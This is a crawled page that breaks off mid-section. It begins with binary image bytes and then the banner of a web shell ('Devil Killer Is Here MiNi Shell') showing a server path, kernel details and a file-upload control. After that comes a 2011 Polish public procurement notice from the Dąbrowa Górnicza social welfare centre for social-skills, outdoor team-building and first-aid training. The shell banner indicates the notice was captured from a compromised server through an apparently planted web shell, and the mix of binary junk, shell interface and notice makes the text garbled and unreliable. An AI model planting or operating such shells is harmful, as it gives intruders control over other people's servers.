JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110520/123784-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Zorganizowanie i przeprowadzenie stacjonarnego i wyjazdowego szkolenia w dziedzinie rozwoju osobistego, w formie treningu umiejętności i kompetencji społecznych, dla uczestników projektu systemowego INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 123784 - 2011; data zamieszczenia: 20.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Skibińskiego 1, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2622528, faks 032 2613694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie stacjonarnego i wyjazdowego szkolenia w dziedzinie rozwoju osobistego, w formie treningu umiejętności i kompetencji społecznych, dla uczestników projektu systemowego INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zorganizowanie i przeprowadzenie stacjonarnego i wyjazdowego szkolenia w dziedzinie rozwoju osobistego, w formie treningu umiejętności i kompetencji społecznych, dla uczestników projektu systemowego INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej.
Postępowanie składa się z dwóch modułów:
MODUŁ 1 -  Zorganizowanie i przeprowadzenie wyjazdowego szkolenia w dziedzinie rozwoju osobistego, w formie treningu umiejętności i kompetencji społecznych, dla uczestników projektu systemowego INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej.
MODUŁ 2 - Zorganizowanie i przeprowadzenie stacjonarnego szkolenia w dziedzinie rozwoju osobistego, w formie treningu umiejętności i kompetencji społecznych, dla uczestników projektu systemowego INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej. 
Cel główny realizacji szkolenia:
-podniesienie i rozwój kompetencji społecznych i umiejętności społecznych niezbędnych do tworzenia i utrzymywania prawidłowych relacji społecznych i zawodowych.
Cele szczegółowe realizacji szkolenia:
-rozwój umiejętności komunikacyjnych,
-wzmacnianie poczucia własnej wartości,
-budowanie pozytywnej samooceny,
-rozwój umiejętności radzenia sobie ze stresem,
-rozwój umiejętności pracy w zespole,
-rozwój umiejętności analizowania sytuacji społecznej,
-rozwój umiejętności empatycznych - empatia poznawcza,
-rozwój umiejętności monitorowania własnych zachowań ekspresyjnych i umiejętności dopasowywania ich do kontekstu sytuacyjnego,
-rozwój zainteresowania sytuacjami społecznymi,
-rozwój umiejętności redukowania lęku społecznego i lęku przed dezaprobatą społeczną.
III.1.  MODUŁ 1 - Zorganizowanie i przeprowadzenie wyjazdowego szkolenia w dziedzinie rozwoju osobistego, w formie treningu umiejętności i kompetencji społecznych, dla uczestników projektu systemowego INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej. 
1). Liczba uczestników:  maksymalna  68 osób, w tym 44 uczestników i 24 osoby z otoczenia.
 minimalna  61 osób, w tym 40 uczestników i 21 osób z otoczenia.
Uwaga !
1. Zamawiający dopuszcza możliwość podziału liczby uczestników na grupy i realizacji szkolenia w dwóch wyjazdach w terminie określonym w rozdz.V.
2. Osoby z otoczenia  mogą być w  różnych  grupach wiekowych.
2). Czas trwania i termin realizacji:  weekend od piątku do niedzieli  (wyjazd w piątek w godzinach południowych tj. między godziną 12.00-14.00, powrót  w niedzielę  w godzinach wieczornych  tj. między 19.00 - 20.00 ) w terminie od daty podpisania umowy do 31 lipca 2011r. 
3). Liczba godzin szkoleniowych  na 1 grupę: 14 godzin w tym:
- w pierwszym dniu zajęć (piątek) 2 godziny dydaktyczne (45 min)
- w drugim dniu zajęć (sobota ) 8 godzin zegarowych ( 60 min)
- w trzecim dniu zajęć ( niedziela)4 godziny dydaktyczne ( 45 min)
Uwaga! 
Zajęcia powinny odbywać się w grupach do 15 osób.
4). Zakres treningu  do wykonania obejmuje w szczególności następujące działania:
A). WARSZTATY RÓWNOŚCI SZANS
Czas trwania: 2 godziny dydaktyczne (piątek).
Ilość uczestników:  min.40 - max.44
Forma  zajęć:
Zajęcia powinny być zrealizowane w formie warsztatów teoretycznych i praktycznych w warunkach sali szkoleniowej. 
Proponowana tematyka zajęć:
Podczas części teoretycznej i praktycznej warsztatów winny być poruszone następujące zagadnienia:
- stereotypy płci, jako zasadniczy czynnik nierówności i dyskryminacji,
- definicja dyskryminacji, w tym ze względu na płeć i wielokrotnej,
- segregacja rynku pracy ze względu na płeć oraz stereotypy związane z aktywnością zawodową kobiet  i mężczyzn,
- stereotypowy podział obowiązków domowych,
- wychowanie dzieci oraz opieka nad osobami zależnymi zadaniem również mężczyzn,
- godzenie życia zawodowego i prywatnego,
- formy przemocy ze względu na płeć.
Cel zajęć:
- zwiększenie świadomości uczestników na temat istniejących stereotypów;
- wskazanie uczestnikom nieuświadomionych postaw i zachowań nacechowanych uprzedzeniami;
- uświadomienie uczestnikom zasad prawidłowego - partnerskiego podziału obowiązków domowych;
- wskazanie uczestnikom jak ważną rolę w życiu całej rodziny pełnią zatrudnienie oraz niezależność finansowa kobiet oraz czynny udział mężczyzn w wychowywaniu dzieci i pracach domowych.
B). TRENING ROZWOJU UMIEJĘTNOŚCI RELACYJNYCH
Czas trwania: 8 godzin zegarowych (sobota)
Ilość uczestników:  min. 40 -  max. 44
Forma zajęć : Zajęcia w ramach tego bloku szkoleniowego winny mieć  formę charakterystyczną dla szkoleń typu outdoor i zajęć team building, a zorganizowane będą w terenie. Istotą tego szkolenia terenowego jest rozwój przez osobiste i grupowe doświadczanie.  Doświadczenia i umiejętności nabywane przez uczestników podczas zajęć muszą być następnie analizowane,  a wnioski z nich przyswajane przez uczestników w formie wiedzy opartej na przeżyciach.  Uczestnicy podczas zajęć i wykonywania zadań obserwują, słuchają, działają, analizują oraz mają czas i przestrzeń do dzielenia się pomysłami i wnioskami. Wszystkie zadania powierzone uczestnikom mają prowadzić do wszechstronnego ich zaangażowania się w proces własnego rozwoju. Zajęcia powinny odbywać się w oparciu  o zwarty scenariusz fabularny, ze szczególnym uwzględnieniem specyfiki grupy uczestniczącej w szkoleniu. 
Proponowana tematyka zajęć:
1. Przeciąganie platformy - zajęcia drużynowe podczas których uczestnicy za pomocą specjalnej platformy i lin muszą się przemieścić na wyznaczoną odległość podkładając pod platformę drewniane okrągłe wałki. Uczestnicy nie mogą schodzić z platformy, a za każde dotknięcie ziemi przez członka drużyny naliczane są punkty karne w postaci doliczonych sekund do osiągniętego przez drużynę czasu w jakim pokonała na platformie wyznaczony odcinek.
2. Telefon terenowy- zajęcia drużynowe podczas, których drużyna wspólnie na podstawie odkrywanych w terenie wskazówek poszukuje ukrytego telefonu wojskowego. Po odnalezieniu telefonu, drużyna przeprowadza instalację 30m kabla i nadaje do  dowództwa specjalny meldunek. 
3. Wielodrużynowe przeciąganie liny - zajęcia drużynowe polegające na przeciąganiu liny przez kilka drużyn jednocześnie. Zwycięzcą zostaje drużyna, która zdobędzie swoją flagę umieszczoną w określonej odległości za ostatnim zawodnikiem danej drużyny.
4. Labirynt - zajęcia drużynowe podczas, których poszczególni członkowie drużyny z zawiązanymi oczami pokonują na czas labirynt, kierowani i prowadzeni przez pozostałą cześć drużyny. Za naruszenie konstrukcji labiryntu przez np. dotknięcie ścian labiryntu, drużyna otrzymuje punkty karne, w postaci doliczonych sekund do osiągniętego przez drużynę czasu pokonania labiryntu.
5. Nosze - zajęcia drużynowe podczas których zespół  przy wykorzystaniu specjalnych bali i lin oraz znalezionych w terenie materiałów, buduje terenowe nosze na których transportuje członków swojego zespołu w wyznaczone przez trenerów miejsce. Punkty karne, w postaci doliczonych sekund do osiągniętego przez drużynę czasu przetransportowania członków zespołu w wyznaczone miejsce, przydzielane są za każde dotknięcie ziemi przez transportowaną na noszach osobę.
6. Rynna - zajęcia drużynowe podczas, których zespół wykorzystując małe kawałki rynny buduje rynnę za pomocą której musi przetransportować określoną ilość wody. Zwycięża drużyna, która wykona zadanie w najkrótszym czasie i przetransportuje największą ilość wody.
Cel zajęć:
- wzmocnienie pewności siebie i zdecydowania uczestników w życiu codziennym,
- zapoznanie uczestników z alternatywną formą wyrażania ekspresji,
- uwalnianie u uczestników naturalnych pokładów aktywności,
- mobilizacja uczestników do zwiększenia wysiłku, wydajności i polepszenia koncentracji uwagi,
- nabycie umiejętności radzenia sobie w trudnych sytuacjach,
- kształtowanie prawidłowych postaw ludzkich i społecznych, 
- zwiększenie motywacji do działania i aktywności społecznej, 
- wzmocnienie pewności siebie i efektywności osobistej, poczucia sprawstwa,
- zwiększenie umiejętności pracy zespołowej.
Uwaga!
1. Wykonawca zapewni wszystkim uczestnikom zajęć terenowych zewnętrzną odzież ochronną uwzględniającą  specyfikę organizowanych zajęć i dostosowaną do  warunków pogodowych.
2. Zajęcia terenowe odbywać się winny na otwartym terenie np. las, park,  itp. Miejsca realizacji   poszczególnych zadań integracyjno-sprawnościowych muszą być zabezpieczone w sposób profesjonalny i zgodnie z obowiązującymi przepisami. 
C).  WARSZTATY PIERWSZEJ POMOCY
Czas trwania: 4 godziny dydaktyczne (niedziela)
Ilość uczestników:  min.40 -  max. 44
Forma zajęć:
Zajęcia powinny być przeprowadzone w formie warsztatów teoretycznych i praktycznych w warunkach sali szkoleniowej lub w terenie. Szkolenie winno obejmować zabiegi mające na celu pomoc poszkodowanemu w stanie zagrożenia życia i innych sytuacjach wymagających udzielenia pierwszej pomocy. Zamawiający wymaga, żeby program tego szkolenia sporządzony przez Wykonawcę dostosowany był do odbiorców, czyli osób dorosłych nie posiadających wykształcenia medycznego.  Szkolenie powinno być zorganizowane zgodne z wytycznymi Europejskiej Rady Resuscytacji (ERC). 
Proponowana tematyka zajęć:
Podczas części teoretycznej i praktycznej warsztatów winny być  poruszone następujące zagadnienia:
- motywacja do udzielania pomocy, przepisy prawne oraz aspekty psychologiczne;
- bezpieczeństwo własne oraz poszkodowanego,
- skuteczne wzywanie pomocy oraz ewakuacja z zagrożonego miejsca,
- podstawy anatomii i fizjologii,
- kontrola podstawowych funkcji życiowych,
- resuscytacja krążeniowo- oddechowa,
- udrażnianie dróg oddechowych,
- rany, krwotoki, złamania, zwichnięcia, skręcenia,
- urazy rdzenia kręgowego, oparzenia, wstrząs oraz nagłe zachorowania,
- skład i sposoby wykorzystania apteczek domowych.
Cel zajęć:
- nabycie umiejętności  związanych z radzeniem sobie w sytuacjach zagrożenia życia lub zdrowia,
- przełamanie lęków związanych z udzielaniem pierwszej pomocy,
- zwiększenie pewności siebie w życiu codziennym dzięki nabyciu nowych wartościowych umiejętności,
- podniesienie świadomości społecznej w zakresie znaczenia udzielania pierwszej pomocy,
- zwiększenie umiejętności i skuteczności działania w sytuacjach kryzysowych,
- podniesienie świadomości społecznej w zakresie znaczenia udzielania pierwszej pomocy,
- zwiększenie umiejętności i skuteczności działania w sytuacjach kryzysowych.
5). Miejsce realizacji zajęć:
Zajęcia odbywać się będą w pomieszczeniach dostosowanych do ich prowadzenia uwzględniając liczebność osób w grupie, zgodnie z ich specyfiką i odpowiednio w tym celu wyposażonych tj. spełniających warunki m.in. sanitarne, bezpieczeństwa, akustyczne. W przypadku zajęć realizowanych w terenie Wykonawca zapewni teren do realizacji zajęć zgodnie  z ich specyfiką i obowiązującymi  przepisami.
6). Sposób realizacji zajęć:
1. Wykonawca winien dostosować scenariusze poszczególnych zajęć do możliwości jego uczestników,  ze szczególnym uwzględnieniem specyfiki uczenia się osób dorosłych.  W tym celu Wykonawca każdorazowo przed rozpoczęciem zajęć poinformuje uczestników:
- o zakresie danego szkolenia,
- o aspektach w jakich wiedza, umiejętności uzyskane podczas szkolenia będą przydatne w późniejszym życiu każdego z nich, 
- do rozwiązania jakich konkretnych problemów przydadzą się uzyskane umiejętności,
- jakie korzyści płyną z uczestnictwa w poszczególnych treningach, warsztatach.
2. Wykonawca winien dołożyć wszelkich starań, by wiedza przekazywana była uczestnikom w sposób praktyczny, tak by uczestnicy zajęć mogli odbierać ją poprzez doświadczania własne oraz doświadczenia związane z pracą w grupie.
Uwaga!
Tematyka zajęć wskazanych przez Zamawiającego ma charakter przykładowy.  Zamawiający dopuszcza możliwość realizacji zajęć o innej tematyce, jednak prowadzących do osiągnięcia powyżej  określonych celów. 
7). Materiały szkoleniowe:
Wykonawca winien zapewnić uczestnikom zajęć wszelkie materiały dydaktyczne, piśmiennicze i sprzęt niezbędne do ich przeprowadzenia.
8). Kadra:
1. Wykonawca winien zapewnić wykwalifikowaną i doświadczoną kadrę do realizacji poszczególnych zajęć, określonych niniejszym przedmiotem zamówienia. Zamawiający wymaga, aby kadra prowadząca zajęcia dla uczestników  posiadała właściwe do prowadzonych zajęć doświadczenie  oraz kwalifikacje zawodowe określone w rozdz.VI.1 pkt. 3.
2. Wykonawca winien zapewnić ze swej strony koordynatora wyjazdu odpowiedzialnego za zbiórkę, dowóz uczestników i osób z otoczenia, zakwaterowanie i powrót oraz organizację dnia i zajęć na miejscu.
9). Zakwaterowanie:
Wykonawca winien zapewnić zakwaterowanie w miejscowości wypoczynkowej, w paśmie Beskidów, oddalonej od miejsca wyjazdu do 170 km. Obiekt powinien posiadać pokoje 2, 3, 4, 5 osobowe z pełnym węzłem sanitarnym. Ponadto obiekt powinien posiadać jadalnię, sale szkoleniowe dostosowane do liczebności grup i specyfiki zajęć oraz miejsca służące do wspólnego spędzania wolnego czasu.
10). Wyżywienie:
Wykonawca winien zapewnić podczas pobytu  wyżywienie dla uczestników i osób z otoczenia.
a. Dzień pierwszy - przyjazd:
- kolacja integracyjna: porcjowane dania grillowe: karczek z grilla ( 170 g porcja), kiełbasa (150 g porcja), krupniok (150 g porcja), kwaśnica (350 ml), pieczywo - 250 g,  herbata i kawa (wraz z dodatkami: cukier, mleczko, cytryna),  dodatki (musztarda, keczup) oraz naczynia i sztućce. Kolacja o charakterze integracyjnym nawiązywać winna do regionalnego folkloru i przybliżyć uczestnikom i osobom z otoczenia zwyczaje regionalne (oprawa artystyczna, konkursy).
b. Dzień drugi:
- śniadanie: w formie bufetu - w tym co najmniej jedno danie gorące, zimna płyta wędlin i serów, pieczywo, jogurty owocowe, herbata i kawa (wraz z dodatkami: cukier, mleczko, cytryna), soki owocowe, woda mineralna. 
- obiad: dwudaniowy  (zupa  350 g; drugie danie z porcją mięsa, łączna gramatura dania 500 g, w tym mięso lub ryby: 30% całkowitej gramatury dania, wypełnienie - ziemniaki, frytki, kasze, makarony: 35%, surówki, sałatki: 35%), napoje i kompoty muszą wynosić 200 ml na osobę. Gramatura napoju lub kompotu nie jest wliczana do I i II dania. 
-  kolacja: w formie bufetu - w tym co najmniej dwa dania gorące, zimna płyta wędlin i serów, pieczywo, herbata i kawa (wraz z dodatkami: cukier, mleczko, cytryna), soki owocowe, woda mineralna.
c. Dzień trzeci - wyjazd:
- śniadanie: w formie bufetu - w tym co najmniej jedno danie gorące, zimna płyta wędlin i serów, pieczywo, jogurty owocowe, herbata i kawa (wraz z dodatkami: cukier, mleczko, cytryna), soki owocowe, woda mineralna. 
- obiad: dwudaniowy  (zupa 350 g, drugie danie z porcją mięsa, łączna gramatura 500g, w tym mięso lub ryby: 30% całkowitej gramatury dania, wypełnienie - ziemniaki, frytki, kasze makarony: 35%, surówki, sałatki: 35%), napoje i kompoty 200 ml na osobę. Gramatura napoju lub kompotu nie jest wliczana do I i II dania.
d. W czasie trwania zajęć:
- w trakcie zajęć w sali szkoleniowej Wykonawca zapewni uczestnikom bufet kawowy: herbata i kawa po 200  ml na osobę (wraz z dodatkami: cukier, mleczko, cytryna), soki owocowe 200 ml na osobę, woda mineralna -  0,5l na osobę, ciasta  w ilości  200 g na osobę, ciasteczka -  150 g na osobę, owoce w ilości 200 g na osobę), 
- w trakcie zajęć terenowych Wykonawca zapewni uczestnikom wodę mineralną - 2l na osobę w butelkach 0,5l. 
e. W czasie opieki nad osobami z otoczenia - Wykonawca zapewni zimne i gorące napoje:  herbata 200 ml na osobę (wraz z dodatkami: cukier, cytryna), soki owocowe 200ml, woda mineralna 0,5l,  owoce w ilości 200 g na osobę,  słodki poczęstunek (w ilości 300 g na osobę).
f. W przypadku uczestników wymagających indywidualnego dostosowania diety Wykonawca zobowiązuje się do jej zapewnienia na podstawie informacji przekazanej przez Zamawiającego.
g. Wykonawca zobowiązuje się do zapewnienia wyżywienia w ilościach nie niższych od wskazanych przez Zamawiającego.
h. Wykonawca ponosi pełną odpowiedzialność za przestrzeganie zasad systemu HACCP oraz zapewnienia właściwej jakości zdrowotnej żywności, naczyń oraz wyrobów przeznaczonych do kontaktu z żywnością oraz zasad dotyczących przewozu, przygotowywania i podawania artykułów spożywczych zgodnie z wymogami i przepisami SANEPIDU.
11). Transport:
Wykonawca winien zapewnić transport uczestników i osób z otoczenia, z miejsca wyjazdu tj. Dąbrowa Górnicza Plac Wolności przy PKZ, na miejsce pobytu i z powrotem.  Autokary winny posiadać: ilość miejsc pozwalającą na komfortowe i swobodne odbywanie podróży,  klimatyzację. Wykonawca ponosi wszelką odpowiedzialność za sprawność techniczną oraz zapewnienie przewoźnika, który posiada prawo jazdy i uprawnienia dopuszczające go do przewozu osób. 
12). Opieka nad osobami z otoczenia:
1. W czasie trwania zajęć z uczestnikami Wykonawca winien zorganizować aktywnie czas wolny dla osób z otoczenia np. poprzez zajęcia, gry i zabawy integracyjne z elementami edukacyjnymi z wykorzystaniem istniejącej  bazy rekreacyjno - sportowej. 
2. Zamawiający wymaga, aby opiekunami osób z otoczenia były osoby posiadające odpowiednie wykształcenie i kwalifikacje zawodowe określone w rozdz.VI.1 pkt. 3.
13). Dokumentacja szkoleń:
1. Wykonawca winien wydać uczestnikom szkolenia zaświadczenia lub inne dokumenty potwierdzające ukończenie szkolenia.
2. Wykonawca winien udokumentować stopień realizacji celów założonych dla poszczególnych zajęć szkoleniowych (tj. ankiety i  raport z ankiet). 
3. Wykonawca winien przekazać Zamawiającemu przed rozpoczęciem realizacji zamówienia:
-  kopię polisy ubezpieczeniowej NNW,
- program i harmonogram zajęć. 
4. Wykonawca winien przekazać Zamawiającemu wraz z fakturą VAT za zrealizowanie przedmiotu zamówienia:
a. Listy obecności potwierdzające udział w zajęciach szkoleniowych wraz z potwierdzeniem odbioru cateringu (jeżeli dotyczy).
b. Komplet materiałów szkoleniowych przekazanych uczestnikom szkolenia.
c. Listy potwierdzające odbiór materiałów szkoleniowych.
d. Ankiety i raport. 
e. Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia wraz z pisemnym potwierdzeniem odbioru przez uczestników.
f. Kopie wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.
g. Dokumentację fotograficzną w formie elektronicznej (na płycie CD lub DVD).
h. Sprawozdanie merytoryczne z realizacji zajęć.
5. Wszystkie przedłożone kopie winny być potwierdzone przez Wykonawcę za zgodność z oryginałem.
6. Wszystkie listy powinny zawierać własnoręczne podpisy uczestników szkolenia.
14.) Promocja:
Wykonawca winien przeprowadzić wizualizację zgodnie z wytycznymi zawartymi w dokumencie Wytyczne dotyczące oznaczania projektów w ramach PO KL (dokument dostępny na stronie www.efs.slaskie.pl w zakładce Promocja POKL) poprzez:
a. Wykorzystanie dwóch podstawowych obowiązkowych logotypów: logotypu Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej wraz z towarzyszącą im informacją o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
b. Stosowania przy wizualizacji pełnej nazwy projektu w ramach którego realizowany jest przedmiot zamówienia tj.  INTEGRA - program integracji zawodowej i społecznej osób w Dąbrowie Górniczej.
c. Stosowanie przy wizualizacji  hasła promocyjnego Programu Operacyjnego Kapitał Ludzki: Człowiek - najlepsza inwestycja.
d. Bezwzględnego umieszczanie ww. logotypów, haseł, nazw oraz informacji o współfinansowaniu na wszystkich materiałach i dokumentach związanych z realizacją zamówienia oraz na budynkach, w salach oraz wszystkich miejscach, w których odbywają się zajęcia organizowane dla uczestników projektu i osób z ich otoczenia. 
e. Ustne informowanie uczestników szkolenia i osób z ich otoczenia o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
f. Sporządzenie pełnej dokumentacji fotograficznej dokonanej wizualizacji. Dokumentacja fotograficzna winna przedstawiać: wszystkie rodzaje działań/zajęć odbywających się w trakcie realizacji przedmiotu zamówienia wraz elementami wizualizacji oraz przestawiać oznaczenie budynku, sal oraz wszystkich miejsc w których odbywają się zajęcia.
15). Archiwizacja i kontrola:
1. Wykonawca zobowiązany jest przechowywać dokumentację dotyczącą niniejszego zamówienia do 31.12.2020 r. w sposób zapewniający dostępność, poufność i bezpieczeństwo oraz do informowania Zamawiającego o miejscu archiwizacji dokumentów związanych z realizacją niniejszej umowy.
2. Wykonawca udostępni podmiotom kontrolującym wglądu we wszystkie dokumenty związane z realizacją niniejszego zamówienia.
3. Zamawiający zastrzega sobie prawo do odbycia wizyt monitoringujących w celu weryfikacji prawidłowości realizacji zamówienia. 
16). Wymagania  dodatkowe:
1. Wykonawca winien wykonać czynności będące przedmiotem umowy z należytą starannością, zgodnie z najlepszymi praktykami przyjętymi przy świadczeniu tego rodzaju usług.
2. Wykonawca winien sprawować nadzór nad prawidłowym przebiegiem szkolenia.
3. Wykonawca winien ubezpieczyć  uczestników, osoby z otoczenia grupową polisą NNW na okres realizacji zamówienia,  zgodnie ze specyfiką szkolenia. 
4. Wykonawca winien zapewnić uczestnikom szkoleń trwania szkoleń warunków zgodnych z przepisami bezpieczeństwa i higieny, przeciwpożarowymi oraz przepisami ochrony środowiska.
5. Wykonawca winien ponosić wszelkiej odpowiedzialności za działania, które realizuje przy pomocy pracowników, współpracowników, osób za pomocą których wykonuje przedmiot zamówienia.
17). Zapłata:
Zamawiający zapłaci za liczbę osób, które  zostały skierowane do udziału w szkoleniu i zgłoszą się w wyznaczonym w skierowaniu miejscu zbiórki rozpoczynającej szkolenie i przystąpią do jego odbycia,  jednak nie mniej niż minimalna liczba osób określona w SIWZ  dla modułu szkolenia wyjazdowego. 
III.2.  MODUŁ 2 - Zorganizowanie i przeprowadzenie stacjonarnego szkolenia w dziedzinie rozwoju osobistego, w formie treningu umiejętności i kompetencji społecznych, dla uczestników projektu systemowego INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej. 
1). Liczba osób:	maksymalnie 25 osób objętych Programem Aktywności Lokalnej (PAL)minimalnie 23 osoby objęte Programem Aktywności Lokalnej (PAL)
2). Czas trwania:  5 dni  zajęć ( zrealizowanych w terminie: od dnia podpisania umowy do 31 lipca 2011r.)
3). Liczba godzin szkoleniowych: 27 godzin zegarowych.
4). Zakres treningu przewidzianego do wykonania obejmuje w szczególności następujące działania:
A). TRENING WYŁANIANIA LIDERA SPOŁECZNOŚCI LOKALNEJ: 
Czas trwania: 6 godzin zegarowych.
Ilość uczestników: min.23 - max.25 osób.
Forma zajęć: Zajęcia powinny być przeprowadzone w formie warsztatów praktycznych w warunkach sali szkoleniowej (psychodrama, burza mózgów, praca  w  małych  zespołach  nad  rozwiązywaniem  problemów itp.) i zajęć  terenowych (gry integracyjne w plenerze).
Proponowana tematyka zajęć:
